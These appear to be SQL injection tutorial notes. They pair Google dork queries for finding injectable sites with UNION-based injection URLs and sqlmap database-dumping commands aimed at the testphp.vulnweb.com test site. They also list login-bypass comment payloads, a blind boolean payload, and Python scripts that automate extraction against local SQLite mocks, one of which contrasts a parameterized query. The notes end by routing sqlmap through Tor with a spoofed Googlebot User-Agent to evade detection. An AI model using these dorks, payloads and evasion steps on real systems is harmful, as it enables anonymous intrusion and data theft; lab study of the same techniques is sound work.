Reference: http://bbs.pediy.com/thread-218235.htm
Google search:
inurl:"products.php?prodID="
inurl:buy.php?category=
http://testphp.vulnweb.com/listproducts.php?cat=1
http://testphp.vulnweb.com/listproducts.php?cat='
http://testphp.vulnweb.com/listproducts.php?cat=1+order+by+1
http://testphp.vulnweb.com/listproducts.php?cat=1+order+by+6
http://testphp.vulnweb.com/listproducts.php?cat=1+union+select+1,2,3,4,5,6,7,8,9,10,11
http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11
http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,@@version
Sometimes the server will not return @@version directly in the UNION (typically a collation mismatch between the injected column and the original one); convert it instead, replacing @@version with convert(@@version using latin1) or unhex(hex(@@version)).
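To see why each of the URLs above works, here is an added example (not from the original notes or from the pediy thread) that rebuilds a vulnerable `cat=` handler locally and runs the same `order by` / `union select` steps against it. Assumptions: the back end is an in-memory SQLite database with a constructed 4-column products table (so the count found is 4, not the 11 seen on testphp.vulnweb.com), and SQLite has no @@version, so sqlite_version() stands in for it; the convert()/unhex(hex()) workaround is MySQL-only and is not needed here.

```python
import sqlite3

# Constructed sample data: 4 columns, so 'order by 5' errors and
# 'union select 1,2,3,4' lines up.
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE products(id INTEGER, name TEXT, price REAL, cat INTEGER);
INSERT INTO products VALUES (1,'book',9.99,1),(2,'pen',1.50,1),(3,'lamp',19.0,2);
""")


def list_products(cat: str):
    """Mock of listproducts.php?cat=: the parameter is concatenated straight
    into the SQL, which is the flaw the notes exploit. Returns the rows, or
    the error text when the query fails (cat=' lands here)."""
    sql = f"SELECT id, name, price, cat FROM products WHERE cat={cat}"
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error as e:
        return f"ERROR: {e}"


def find_column_count(max_cols: int = 20) -> int:
    """Step 1 (cat=1 order by N): the largest N that does not error is the
    number of columns in the original SELECT."""
    count = 0
    for n in range(1, max_cols + 1):
        if isinstance(list_products(f"1 order by {n}"), str):
            break
        count = n
    return count


def union_marker_row(ncols: int):
    """Step 2 (cat=-1 union select 1,2,...): -1 matches no real category, so
    the only row returned is ours and the numbers that show up on the page
    are the columns it actually displays."""
    markers = ",".join(str(i) for i in range(1, ncols + 1))
    rows = list_products(f"-1 union select {markers}")
    return rows[0] if rows and not isinstance(rows, str) else None


def leak_version(ncols: int, col: int) -> str:
    """Step 3: swap one displayed marker for a function call.
    MySQL: @@version; SQLite (this mock): sqlite_version()."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[col - 1] = "sqlite_version()"
    rows = list_products("-1 union select " + ",".join(cols))
    return rows[0][col - 1]


if __name__ == "__main__":
    print("cat=' ->", list_products("'"))
    n = find_column_count()
    print("columns:", n)
    print("marker row:", union_marker_row(n))
    print("version via column 3:", leak_version(n, 3))
```

The same loop is what sqlmap runs for you in its UNION technique; doing it by hand once makes the `order by 6` versus `order by 1` responses on the real target readable.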
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --time-sec 15
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns
Types of SQL injection attack
Classic SQLi
Blind or inferential SQLi
DBMS-specific SQLi
Compound SQLi
SQL injection + insufficient authentication
SQL injection + DDoS attack
SQL injection + DNS hijacking
SQL injection + XSS
Incorrectly filtered escape characters
This form of SQL injection occurs when user input is not filtered for escape characters and is passed straight into an SQL statement:
statement = "SELECT * FROM users WHERE name ='" + userName + "';"
Comments can even be used to cut off the rest of the query (there are three types of SQL comment). All three lines end with a space:
' or '1'='1' --
' or '1'='1' ({
' or '1'='1' /*
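As an added example (not part of the original notes), the statement above is run against a constructed SQLite users table with the `--` and `/*` payloads, next to the parameterized query that neutralises them. The `({` variant is not a comment SQLite understands and is left out; MySQL additionally accepts `#`. Table name and rows are invented for the example.

```python
import sqlite3

# Constructed sample data.
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE users(name TEXT, role TEXT);
INSERT INTO users VALUES ('alice','admin'),('bob','user');
""")

# The two comment styles SQLite accepts; each swallows the closing "';".
PAYLOADS = [
    "' or '1'='1' --",   # line comment: rest of the statement is ignored
    "' or '1'='1' /*",   # block comment left open runs to end of input
]


def vulnerable_lookup(user_name: str):
    """Same shape as the statement in the notes: input spliced into the
    string, so quotes and comment markers become SQL."""
    statement = "SELECT * FROM users WHERE name ='" + user_name + "';"
    try:
        return conn.execute(statement).fetchall()
    except sqlite3.Error as e:
        return f"ERROR: {e}"


def safe_lookup(user_name: str):
    """Parameterized form: the driver passes the value separately, so the
    payload is compared as a literal name and matches nothing."""
    return conn.execute(
        "SELECT * FROM users WHERE name = ?", (user_name,)
    ).fetchall()


if __name__ == "__main__":
    for p in PAYLOADS:
        print(repr(p), "vulnerable ->", vulnerable_lookup(p))
        print(repr(p), "safe       ->", safe_lookup(p))
```

With either payload the vulnerable query becomes `SELECT * FROM users WHERE name ='' or '1'='1' --';` and returns every user; the parameterized query returns an empty result for the same input and still finds `alice` when asked for `alice`.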
Blind (boolean-based) injection: the page renders only when the appended condition is true, so the version can be read one character at a time:
http://books.example.com/showReview.php?ID=5 AND substring(@@version,1,1)=4
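The condition above yields one bit per request. The added example below (not from the original page) automates it against a mock of showReview.php?ID= backed by SQLite, recovering sqlite_version() (the SQLite stand-in for @@version, with substr() in place of MySQL's substring()) character by character. The reviews table and the "does the review render" oracle are constructed for the example.

```python
import sqlite3

# Constructed sample data: ID=5 exists, so "ID=5 AND <true>" renders.
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE reviews(id INTEGER, body TEXT);
INSERT INTO reviews VALUES (5,'great book'),(6,'meh');
""")


def show_review(id_param: str) -> bool:
    """Mock of showReview.php?ID=: all the attacker observes is whether a
    review rendered (True) or not (False); errors look like 'not rendered'."""
    sql = f"SELECT body FROM reviews WHERE id={id_param}"
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def oracle(condition: str) -> bool:
    """One request, one bit: ID=5 AND <condition>."""
    return show_review(f"5 AND {condition}")


def extract_version(max_len: int = 20) -> str:
    """Read sqlite_version() position by position, testing each candidate
    character with the oracle; stop when substr() past the end is empty."""
    alphabet = "0123456789."          # enough for an X.Y.Z version string
    out = ""
    for pos in range(1, max_len + 1):
        if not oracle(f"length(substr(sqlite_version(),{pos},1))=1"):
            break                     # past the end of the string
        for ch in alphabet:
            if oracle(f"substr(sqlite_version(),{pos},1)='{ch}'"):
                out += ch
                break
        else:
            out += "?"                # character outside our alphabet
    return out


if __name__ == "__main__":
    print("oracle(1=1):", oracle("1=1"), " oracle(1=2):", oracle("1=2"))
    print("version recovered blind:", extract_version())
```

Each character costs up to len(alphabet) requests here; sqlmap's boolean-based technique does the same thing with a binary search over character codes, which is why `--time-sec` and request counts matter so much for blind targets.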
apt-get install tor
tor
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=2 --tor --tor-type=SOCKS5
Add --check-tor so sqlmap verifies that traffic is really leaving through Tor before it starts testing.
Spoof the User-Agent as Googlebot (this only fools filters that trust the header; a server that reverse-resolves the client IP sees a Tor exit, not a Google address):
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=2 --tor --tor-type=SOCKS5 --user-agent="Googlebot (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"